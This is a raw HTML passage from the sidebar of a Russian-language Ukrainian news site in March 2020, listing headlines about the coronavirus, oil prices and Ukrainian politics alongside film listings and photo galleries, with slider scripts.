src="https://enovosty.com/wp-content/uploads/2020/03/azs_771x517-e1584441979768.jpg"></a><a href="https://enovosty.com/news-auto/full/1703-obval-cen-na-neft-chto-budet-so-stoimostyu-benzina-v-ukraine" title="Обвал цен на нефть: что будет со стоимостью бензина в Украине" class="name">Обвал цен на нефть: что будет со стоимостью бензина в Украине <span>(8732)</span></a></li></ul></li><li><ul class="tact"><li id="li7" style="width:210px;"><a href="https://enovosty.com/news_politics/full/1703-stalo-izvestno-kakuyu-voennuyu-pomoshh-poluchit-ukraina-ot-ssha-v-etom-godu" title="Стало известно, какую военную помощь получит Украина от США в этом году"><img width="210" height="156" alt="Стало известно, какую военную помощь получит Украина от США в этом году" src="https://enovosty.com/wp-content/uploads/2020/03/korabli.jpg"></a><a href="https://enovosty.com/news_politics/full/1703-stalo-izvestno-kakuyu-voennuyu-pomoshh-poluchit-ukraina-ot-ssha-v-etom-godu" title="Стало известно, какую военную помощь получит Украина от США в этом году" class="name">Стало известно, какую военную помощь получит Украина от США в этом году <span>(2186)</span></a></li></ul></li><li><ul class="tact"><li id="li8" style="width:210px;"><a href="https://enovosty.com/news_economy/full/1703-rada-poshla-na-kardinalnyj-shag-iz-za-koronavirusa-chto-budet-s-nalogami-i-shtrafami" title="Рада пошла на кардинальный шаг из-за коронавируса. Что будет с налогами и штрафами"><img width="210" height="156" alt="Рада пошла на кардинальный шаг из-за коронавируса. Что будет с налогами и штрафами" src="https://enovosty.com/wp-content/uploads/2020/03/nalog.jpg"></a><a href="https://enovosty.com/news_economy/full/1703-rada-poshla-na-kardinalnyj-shag-iz-za-koronavirusa-chto-budet-s-nalogami-i-shtrafami" title="Рада пошла на кардинальный шаг из-за коронавируса. Что будет с налогами и штрафами" class="name">Рада пошла на кардинальный шаг из-за коронавируса. Что будет с налогами и штрафами <span>(5964)</span></a></li></ul></li></ul></div><div id="lastafisha" class="slide ssingle"><script>jQuery(document).ready(function($){function region(){html = $('#lastafisha .anythingWindow .activePage .region').html();$('#lastafisha .head span').html(html);}$('#sliderafisha').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :false,delay : 4000,resizeContents:false,onInitialized:function(slider){region();}, onSlideComplete:function(slider){region();},});});</script><p style="margin: 0;
font-size: 13pt;
font-weight: 700;
font-family: arial,verdana,tahoma;
text-align: left;
padding: 10px 32px 10px 35px;" class="head">Афиша<span style="float: right; font-size: 11px; line-height: 18px;">&nbsp;</span></p><ul id="sliderafisha"><li><ul class="tact"><li ><div id="post-4797909" class="postafisha"><span class="region">Киев 26&#160;марта</span><div class="aimg"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-veryu-v-lyubov"><img width="170" height="132" alt="Кинопремьера: фильм «Верю в любовь»" src="/wp-content/uploads/2020/03/viru_v.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-veryu-v-lyubov">Кинопремьера: фильм «Верю в любовь»</a></div></div></li></ul></li><li><ul class="tact"><li ><div id="post-4797920" class="postafisha"><span class="region">Киев 26&#160;марта</span><div class="aimg"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-v-chornij-chornij-kimnati"><img width="170" height="132" alt="Кинопремьера: фильм «В Чорній, Чорній ..." src="/wp-content/uploads/2020/03/komnata.jpg"><span class="stopbg"></span></a></div><div class="title"><a href="https://enovosty.com/kino/full/1603-kinopremera-film-v-chornij-chornij-kimnati">Кинопремьера: фильм «В Чорній, Чорній ...</a></div></div></li></ul></li> </ul><a href="https://enovosty.com/afisha" class="allafisha">Вся Афиша&nbsp;&nbsp;&nbsp;&nbsp;>></a></div><div class="wiget simple_pr" id="photoPromo" style="background: #ffe3c8;"><div class="caption"><p style=" text-transform: uppercase; font-weight: 700; font-family: arial,verdana,tahoma; margin: 0; display: block; float: left; color: #fff; padding: 0 5px 0 4px; background-color: #f93; height: 17px; font-size: 12px;
"><a style="color: #fff;" href="https://enovosty.com/photo-nedeli">Фото недели</a></p></div><div class="topnews_single slide gallery2" style="width: 168px; height: 230px; padding: 10px 10px 0; background: #fff; margin: 10px;"><ul id="slider_gallery2"><li><ul class="tact"><li id="li0" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=553&pid=12055" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/glaza_g/thumbs/thumbs_01.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Если бы животных были глаза спереди..."></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=553&pid=12055" title="Если бы животных были глаза спереди..." class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Если бы животных были глаза спереди...</a></li></ul></li><li><ul class="tact"><li id="li1" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=552&pid=12037" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/foto40_tsvet/thumbs/thumbs_robertyarnallrichie03.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Цветные фотографии 1940-х"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=552&pid=12037" title="Цветные фотографии 1940-х" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Цветные фотографии 1940-х</a></li></ul></li><li><ul class="tact"><li id="li2" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=551&pid=12034" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/volni_voda/thumbs/thumbs_09.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Что приносят волны"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=551&pid=12034" title="Что приносят волны" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Что приносят волны</a></li></ul></li><li><ul class="tact"><li id="li3" style="width:168px; background-color: #fff;"><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=550&pid=12005" style="height: 160px;"><img width="168" src="https://enovosty.com/wp-content/gallery/odessa_30x/thumbs/thumbs_00.jpg" style="object-fit: cover;object-position: 100% 0;width: 100%;height: 160px;" alt="Одесса 30-х годов глазами американского фотографа"></a><a href="https://enovosty.com/photo-nedeli/full/photo-gallery?album=1&gallery=550&pid=12005" title="Одесса 30-х годов глазами американского фотографа" class="name" style="font-weight: normal;
padding: 5px 3px 5px 3px;
display: block;
margin-left: 2px;
font-size: 15px;
line-height: 1.2;
">Одесса 30-х годов глазами американского фотографа</a></li></ul></li></ul></div> <div class="cls"></div> <a href="https://enovosty.com/photo-nedeli" class="readMore">Все фото &raquo;</a></div><script>jQuery(document).ready(function($){$('#slider_gallery2').anythingSlider({ theme : 'minimalist-round', buildStartStop  : false,buildNavigation : false,enableNavigation : false,hashTags : false,autoPlay :true,delay : 8000,autoPlayLocked : true,pauseOnHover : true
});});</script><style>.topnews_single.gallery2 div.anythingSlider-minimalist-round span.arrow{height:160px}</style><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption" style=""><p style="font-size: 12px; height: 17px; color: #fff; background-color: #346796; padding: 0 5px; display: inline; text-transform: uppercase; font-weight: 700;font-family: arial,verdana,tahoma;">Новости культуры</p></div><div class='cls'></div><span class='news_date'>19.03.2020 г.</span><br /><div class="post_news"><span id="post-4798428"><span class="postDate">07:45</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set">Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире "взорвала" сеть</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>18.03.2020 г.</span><br /><div class="post_news"><span id="post-4798437"><span class="postDate">23:29</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1803-foto-dnya-vosxod-solnca-sfotografirovannyj-dronom-nad-zamkom-lids">Фото дня: Восход солнца, сфотографированный дроном, над замком Лидс</a><br /><div class="postFields"></div></span></div><div class="post_news"><span id="post-4798271"><span class="postDate">07:00</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1803-provodit-vremya-s-polzoj-arnold-shvarcenegger-pokazal-kak-pravilno-myt-ruki-video">Проводит время с пользой: Арнольд Шварценеггер показал, как правильно мыть руки (ВИДЕО)</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>17.03.2020 г.</span><br /><div class="post_news"><span id="post-4798289"><span class="postDate">21:43</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1703-mozg-vzryvaetsya-dzhared-leto-12-dnej-meditiroval-v-pustyne-i-nichego-ne-znal-pro-pandemiyu-koronavirusa">«Мозг взрывается»: Джаред Лето 12 дней медитировал в пустыне и ничего не знал про пандемию коронавируса</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>16.03.2020 г.</span><br /><div class="post_news"><span id="post-4797989"><span class="postDate">07:00</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1603-kogda-koronavirus-vdoxnovlyaet-na-iskusstvo-v-kieve-poyavilsya-novyj-mural-na-aktualnuyu-temu-foto">Когда коронавирус вдохновляет: в Киеве появился новый мурал на актуальную тему (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>15.03.2020 г.</span><br /><div class="post_news"><span id="post-4797951"><span class="postDate">08:32</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1503-novaya-karikatura-sergeya-elkina-pro-putina-stala-xitom-seti">Новая карикатура Сергея Елкина про Путина стала хитом сети</a><br /><div class="postFields"></div></span></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>12.03.2020 г.</span><br /><div class="post_news"><span id="post-4797609"><span class="postDate">07:00</span><a class="postTitle" href="https://enovosty.com/news-culture/full/1203-v-indii-vo-vremya-prazdnovaniya-festivalya-xoli-sozhgli-demona-koronavirusa-foto">В Индии во время празднования фестиваля Холи сожгли "демона коронавируса" (ФОТО)</a><br /><div class="postFields"></div></span></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/news-culture">Все новости культуры</a></div><div class="wiget simple_line analitika"> <div class="caption"><p style="text-transform: uppercase;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;"><a href="https://enovosty.com/articles">Аналитика</a></p></div><div class="block"><div class="info"><span class="postDate">16.03.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/markets/full/1603-gibel-bogov">Гибель Богов</a></p><div class="cblock"><a href="https://enovosty.com/markets/full/1603-gibel-bogov"><img width="230" alt="Гибель Богов" src="/wp-content/uploads/2020/03/5g.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/markets/full/1603-gibel-bogov">В далеком 1992 году на рынке связи Украины создаются первых два гиганта с иностранными инвестициями – УМС и Утел. В страну пришли первые серьезные деньги, ...</a></span></div><div class="block"><div class="info"><span class="postDate">16.03.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1603-mirovoj-ekonomicheskij-shok-iz-za-koronavirusa-posledstviya-dlya-ukrainskoj-ekonomiki">Мировой экономический шок из-за коронавируса: последствия для украинской экономики</a></p><div class="cblock"><a href="https://enovosty.com/ekonomika/full/1603-mirovoj-ekonomicheskij-shok-iz-za-koronavirusa-posledstviya-dlya-ukrainskoj-ekonomiki"><img width="230" alt="Мировой экономический шок из-за коронавируса: последствия для украинской экономики" src="/wp-content/uploads/2020/03/cover_ekonomika.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/ekonomika/full/1603-mirovoj-ekonomicheskij-shok-iz-za-koronavirusa-posledstviya-dlya-ukrainskoj-ekonomiki">Председатель Европейского центрального банка Кристин Лагард предупреждает, что европейские страны могут столкнуться с масштабным экономическим шоком, ...</a></span></div><div class="block"><div class="info"><span class="postDate">13.03.2020</span></div><p style="margin-bottom: 3px;
margin: 0;
padding: 0;
text-align: left;
font-size: 12px;
font-weight: 700;
font-family: arial,verdana,tahoma;
"><a class="postTitle" href="https://enovosty.com/politika/full/1403-itogi-dnya-pervaya-smert-ot-koronavirusa-zakrytye-granicy-i">Итоги дня: Первая смерть от коронавируса, закрытые границы и продление санкций</a></p><div class="cblock"><a href="https://enovosty.com/politika/full/1403-itogi-dnya-pervaya-smert-ot-koronavirusa-zakrytye-granicy-i"><img width="230" alt="Итоги дня: Первая смерть от коронавируса, закрытые границы и продление санкций" src="/wp-content/uploads/2020/03/2478709-e1584119430609.jpg"></a></div><span class="postExcerpt"><a href="https://enovosty.com/politika/full/1403-itogi-dnya-pervaya-smert-ot-koronavirusa-zakrytye-granicy-i">Коронавирус в Украине отнял первую жизнь, Владимир Зеленский подписал закон о среднем образовании, а ЕС решил продлить санкции против России, - такими ...</a></span></div></div><div class="wiget simple_line" style="border-color:#D6E5F2;"><div class="caption"><p style="font-weight: 700; font-family: arial,verdana,tahoma; font-size: 12px; text-transform: uppercase; margin: 0; padding: 0; text-align: left;height: 17px;"><a href="https://enovosty.com/news/">Последние новости</a></p></div><div class='cls'></div><span class='news_date'>19.03.2020 г.</span><br /><div class="post_news"> <span id="post-4798469"> <span class="postDate">09:27</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1903-v-ukraine-stali-proizvodit-bolshe-medicinskogo-spirta">В Украине стали производить больше медицинского спирта</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798464"> <span class="postDate">09:27</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-nablyudem-kitaj-prodolzhaet-energeticheskoe-izbienie-rossii-zloj-odessit">"Наблюдем": Китай продолжает энергетическое избиение России, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798460"> <span class="postDate">09:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-otnesites-k-etomu-serezno-silnoe-obrashhenie-merkel-na-kotoroe-stoit-obratit-vnimanie-ukraincam">Отнеситесь к этому серьезно: Сильное обращение Меркель, на которое стоит обратить внимание украинцам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798468"> <span class="postDate">09:10</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-cukerberg-zaplatit-po-tysyache-dollarov-kazhdomu-udalennomu-sotrudniku">Цукерберг заплатит по тысяче долларов каждому удаленному сотруднику</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798467"> <span class="postDate">09:08</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1903-v-uxane-za-sutki-ni-odnogo-novogo-sluchaya-koronavirusa">В Ухане за сутки ни одного нового случая коронавируса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798451"> <span class="postDate">08:44</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-mir-stal-dobree-koronavirus-pomiril-izrail-i-palestinu">Мир стал добрее: коронавирус помирил Израиль и Палестину</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798462"> <span class="postDate">08:25</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-yolkin-miloj-karikaturoj-pokazal-kak-stoit-borotsya-s-panikoj">Ёлкин милой карикатурой показал, как стоит бороться с паникой</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798458"> <span class="postDate">08:22</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-v-germanii-vystupili-s-predatelskim-zayavlenie-po-sankciyam">В Германии выступили с предательским заявлением по санкциям</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798461"> <span class="postDate">08:21</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1903-zelenskij-chetko-otvetil-kogda-v-ukraine-projdet-indeksaciya-pensij">Зеленский четко ответил, когда в Украине пройдет индексация пенсий</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798453"> <span class="postDate">08:03</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-virus-russkogo-mira-daet-bolshuyu-letalnost-chem-vse-ostalnye-sergej-ivanov">Вирус «русского мира» дает большую летальность, чем все остальные - Сергей Иванов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798421"> <span class="postDate">08:01</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-chtoby-bylo-chem-platit-personalu-na-vremya-karantina-klient-restorana-v-ssha-ostavil-na-chaj-bolee-9-tysyach-dollarov">Чтобы было чем платить персоналу на время карантина: клиент ресторана в США оставил на чай более 9 тысяч долларов</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798457"> <span class="postDate">08:01</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-v-izraile-rezko-izmenili-mnenie-pandemiya-koronavirusa-okazalas-ne-takoj-strashnoj">В Израиле резко изменили мнение: Пандемия коронавируса оказалась не такой страшной</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798428"> <span class="postDate">07:45</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1903-smeshnaya-i-optimistichnaya-pesnya-pro-situaciyu-v-koronavirusnom-mire-vzorvala-set">Без паники: Смешная и оптимистичная песня про ситуацию в коронавирусном мире "взорвала" сеть</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798447"> <span class="postDate">07:29</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1903-pandemiya-koronavirusa-spaset-chelovecheskie-zhizni-uchenye">Пандемия коронавируса спасет человеческие жизни - ученые</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798445"> <span class="postDate">07:23</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-obyavlen-mirovoj-krizis-vozvrashhaemsya-v-90-e">Объявлен мировой кризис: возвращаемся в 90-е</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798417"> <span class="postDate">07:15</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1903-kiev-znachitelno-vyros-v-rejtinge-gorodov-po-stoimosti-zhizni">Киев значительно вырос в рейтинге городов по стоимости жизни</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798412"> <span class="postDate">07:00</span> <a class="postTitle" href="https://enovosty.com/news-auto/full/1903-v-ukraine-mozhet-podeshevet-stoimost-ustanovki-gbo">В Украине может подешеветь стоимость установки ГБО</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798418"> <span class="postDate">07:00</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1903-prizyv-na-voennuyu-sluzhbu-v-ukraine-vremenno-ostanovlen-iz-za-karantina">Призыв на военную службу в Украине временно остановлен из-за карантина</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798443"> <span class="postDate">06:58</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/103-letnyaya-zhitelnica-irana-vyzdorovela-posle-zarazheniya-koronavirusom">103-летняя жительница Ирана выздоровела после заражения коронавирусом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798446"> <span class="postDate">04:28</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1903-tramp-nazval-sebya-prezidentom-voennogo-vremeni">Трамп назвал себя президентом военного времени</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><hr /><div class="cls"></div><div class='cls'></div><span class='news_date'>18.03.2020 г.</span><br /><div class="post_news"> <span id="post-4798437"> <span class="postDate">23:29</span> <a class="postTitle" href="https://enovosty.com/news-culture/full/1803-foto-dnya-vosxod-solnca-sfotografirovannyj-dronom-nad-zamkom-lids">Фото дня: Восход солнца, сфотографированный дроном, над замком Лидс</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798438"> <span class="postDate">23:00</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-ekspert-rasskazal-chego-ozhidat-ukrainskoj-ekonomike-v-blizhajshem-budushhem">Эксперт рассказал, чего ожидать украинской экономике в ближайшем будущем</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798409"> <span class="postDate">22:55</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-ne-koronavirusom-edinym-koty-zasnuvshie-v-samyx-nepodxodyashhix-mestax-foto">Не коронавирусом единым: коты, заснувшие в самых неподходящих местах (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798434"> <span class="postDate">22:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-policejskie-presekli-deyatelnost-nezakonnoj-fermy-po-majningu-kriptovalyut">Полицейские пресекли деятельность незаконной фермы по майнингу криптовалют</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798432"> <span class="postDate">22:20</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1803-fursa-rasskazal-chto-budet-s-dollarom-v-ukraine">Фурса рассказал, что будет с долларом в Украине</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798380"> <span class="postDate">22:16</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-sozdatel-igry-prestolov-dzhordzh-martin-pishet-noviy-roman">Создатель «Игры престолов» Джордж Мартин самоизолировался и пишет новый роман</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798430"> <span class="postDate">21:56</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-v-ispanii-raskopali-poteryannye-vorota-legendarnogo-dvorcovogo-goroda-10-veka">В Испании раскопали потерянные ворота легендарного дворцового города 10 века</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798427"> <span class="postDate">21:18</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-beda-na-neftyanom-rynke-evropy-prishla-k-rossijskim-neftyanikam-ne-odna-anti-colorados">Беда на нефтяном рынке Европы пришла к российским нефтяникам не одна, - Аnti-colorados</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798424"> <span class="postDate">20:58</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-v-ssha-proizoshlo-silnoe-zemletryasenie-video">В США произошло сильное землетрясение (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798416"> <span class="postDate">20:24</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-vsemirnyj-bank-uvelichivaet-obem-finansirovaniya-programm-napravlennyx-na-borbu-s-posledstviyami-koronavirusa">Всемирный банк увеличивает финансирование программ, направленных на борьбу с последствиями коронавируса</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798407"> <span class="postDate">19:54</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-snizhenie-mirovyx-cen-na-neft-eto-vozmozhnost-izbezhat-povysheniya-cen-na-toplivo-yaroslav-zhalilo">Снижение мировых цен на нефть - это возможность избежать повышения цен на топливо, - Ярослав Жалило</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798404"> <span class="postDate">19:28</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1803-v-ukraine-nekotorye-banki-perestali-prodavat-nalichnuyu-valyutu">В Украине некоторые банки перестали продавать наличную валюту</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798398"> <span class="postDate">18:54</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-sbu-blokirovala-nezakonnyj-sbyt-drevesiny">СБУ блокировала незаконный сбыт древесины</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798394"> <span class="postDate">18:17</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-v-rossii-obvalilisya-kurs-rublya">В России обвалилися курс рубля</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798392"> <span class="postDate">17:51</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-na-okkupirovannom-donbasse-terroristy-podvergayut-svyashhennikov-nasiliyu-za-pomoshh-ukrainskim-voennosluzhashhim">На оккупированном Донбассе террористы подвергают священников насилию за помощь украинским военнослужащим</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798384"> <span class="postDate">17:43</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1803-vitalij-klichko-my-ne-znaem-skolko-sredi-nas-inficirovannyx-koronavirusom-video">Виталий Кличко: Мы не знаем, сколько среди нас инфицированных коронавирусом (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798388"> <span class="postDate">17:25</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-rossijskaya-neft-urals-probila-kriticheskuyu-otmetku-v-25-za-barrel-zloj-odessit">Российская нефть Urals пробила критическую отметку в $25 за баррель, - "Злой одессит"</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798386"> <span class="postDate">17:21</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-nacpoliciya-budet-kontrolirovat-vypolnenie-ogranichitelnyx-trebovanij-po-passazhirskim-perevozkam">Нацполиция будет контролировать выполнение ограничительных требований по пассажирским перевозкам</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798381"> <span class="postDate">16:44</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-vlast-sdelala-malo-dlya-zashhity-malogo-biznesa-na-period-karantina-iz-za-epidemii-koronavirusa-video">Власть сделала мало для защиты малого бизнеса на период карантина из-за эпидемии коронавируса (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798383"> <span class="postDate">16:39</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-stoimost-nefti-brent-upala-nizhe-27-vpervye-za-17-let">Стоимость нефти Brent упала ниже $27 впервые за 17 лет</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798378"> <span class="postDate">15:56</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1803-v-stolice-podskochila-stoimost-dollara-i-evro">В столице подскочила стоимость доллара и евро</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798375"> <span class="postDate">15:08</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-kabmin-planiruet-chastichno-vozmestit-ukraincam-kommunalku-iz-za-karantina">Кабмин планирует частично возместить украинцам коммуналку из-за карантина</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798343"> <span class="postDate">15:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-kitaj-xochet-lazerami-atakovat-amerikanskie-korabli-v-yuzhno-kitajskom-more">Китай хочет лазерами атаковать американские корабли в Южно-Китайском море</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798374"> <span class="postDate">14:35</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1803-koronavirus-v-verxovnoj-rade-nardeput-sergej-shaxov-podtverdil-chto-inficirovan-covid-19-video">Коронавирус в Верховной Раде: нардеп Сергей Шахов подтвердил, что инфицирован COVID 19 (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798362"> <span class="postDate">14:20</span> <a class="postTitle" href="https://enovosty.com/news_kiev/full/1803-enoty-iz-kievskogo-zooparka-rasskazali-kak-vesti-sebya-vo-vremya-karantina-video">Еноты из Киевского зоопарка рассказали, как вести себя во время карантина (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798340"> <span class="postDate">14:00</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1803-kak-vyglyadel-mir-do-i-posle-koronavirusa-foto">Как выглядел мир до и после коронавируса (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798372"> <span class="postDate">13:55</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1803-moz-ukrainy-ozvuchil-oficialnuyu-statistiku-po-zabolevaemosti-covid-19-v-ukraine-video">МОЗ Украины озвучил официальную статистику по заболеваемости COVID-19 в Украине (ВИДЕО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798359"> <span class="postDate">13:40</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1803-pandemiya-covid-19-multyashnye-kejt-middlton-i-megan-markl-prizvali-narod-ostavatsya-doma-foto">Пандемия Covid-19: мультяшные Кейт Миддлтон и Меган Маркл призвали народ оставаться дома (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798364"> <span class="postDate">13:04</span> <a class="postTitle" href="https://enovosty.com/news_economy/full/1803-ekonomicheskie-kulbity-chto-zhdet-ukrainskix-ajtishnikov">Экономические кульбиты: Что ждет украинских айтишников?</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798329"> <span class="postDate">13:00</span> <a class="postTitle" href="https://enovosty.com/zdorove/full/1803-pentagon-peredast-5-millionov-zashhitnyx-masok-iz-svoix-zapasov-dlya-borby-s-koronavirusom">Пентагон передаст 5 миллионов защитных масок из своих запасов для борьбы с коронавирусом</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4798361"> <span 